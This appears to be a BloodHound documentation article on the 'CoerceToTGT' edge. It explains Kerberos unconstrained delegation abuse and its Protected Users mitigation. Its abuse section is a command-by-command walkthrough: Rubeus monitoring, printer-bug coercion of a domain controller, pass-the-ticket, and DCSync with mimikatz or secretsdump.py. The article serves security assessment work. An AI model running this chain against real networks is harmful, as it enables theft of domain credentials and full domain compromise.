CoerceToTGT

This article applies to BHCE and BHE

The computer/user account is configured with Kerberos unconstrained delegation.

In a standard Kerberos authentication process, when a principal accesses a Kerberos-enabled service, they present a service ticket to the service host (a computer or service account). This ticket cannot be used to authenticate against other services. However, if a computer or service account is trusted for unconstrained delegation, the principal sends their full Kerberos Ticket Granting Ticket (TGT). This TGT can be forwarded, allowing the service host to impersonate the principal across other services within the environment.

An attacker can coerce a Tier Zero computer (e.g. DC) to authenticate against the account and obtain the target's TGT. With the TGT of a DC, the attacker can perform DCSync to compromise the domain. Alternatively, the TGT can be used to obtain admin access to the target host with a shadow credentials + silver ticket attack or a resource-based constrained delegation attack.

Accounts marked as sensitive or belonging to the Protected Users group are protected against the attacks as they will not send their TGTs to accounts with unconstrained delegation enabled.

Abuse Info

A common way for attackers to abuse unconstrained delegation is for the attacker to coerce a DC using the printspooler.

The attack will fail if the target is a member of Protected Users or marked as sensitive, as the TGT of those principals will not be sent to the principal with unconstrained delegation. You can find all the protected principals with this Cypher query:

MATCH (g:Group)
WHERE g.objectid ENDS WITH "-525"
MATCH (n:Base)
WHERE n.sensitive = TRUE OR (n)-[:MemberOf*..]->(g)
RETURN n
LIMIT 1000

There are many other coercion techniques than printspooler that can be used (see References).

The instructions provided here are for abusing a computer with unconstrained delegation. For abuse of a user, see Abusing Users Configured with Unconstrained Delegation.

Step 1: Start monitoring for TGTs

Log in on the computer configured with unconstrained delegation and open CMD as Administrator.

Start monitoring for incoming TGTs using Rubeus:

Rubeus.exe request monitor /user:<target DC DNS name> /interval:5 /nowrap

Step 2: Coerce target DC

From any host in the domain, coerce the target DC using printspooler.

Windows:

SpoolSample.exe <target DC DNS name> <compromised computer DNS name>

Linux:

printerbug.py '<domain>/<username>:<password>'@<target DC IP> <compromised computer IP>

Rubeus will print the DC TGT as it is received.

Step 3: Pass the Ticket

Windows:

Inject the DC TGT into memory using Rubeus on any computer in the domain:

Rubeus.exe ptt /ticket:doIFvjCCBbqgAwI...

Linux:

Save the TGT base64 blob as a .kirbi file:

echo "doIFvjCCBbqgAwI..." | base64 -d | tee ticket.kirbi > /dev/null

Convert the TGT to ccache format using ticketConverter.py:

ticketConverter.py ticket.kirbi ticket.ccache

Set the KRB5CCNAME environment variable to the ticket's path:

export KRB5CCNAME=$path_to_ticket.ccache

Step 4: DCSync target domain

Windows:

Use mimikatz to DCSync the domain from the computer where the DC TGT was injected:

lsadump::dcsync /domain:<domain.name> /user:<DOMAIN\targetuser>

Linux:

Use secretsdump.py to DCSync the target domain:

secretsdump.py -k -just-dc-user <DOMAIN/targetuser> <target DC DNS name>

Opsec Considerations

There is no opsec information for this edge.

Updated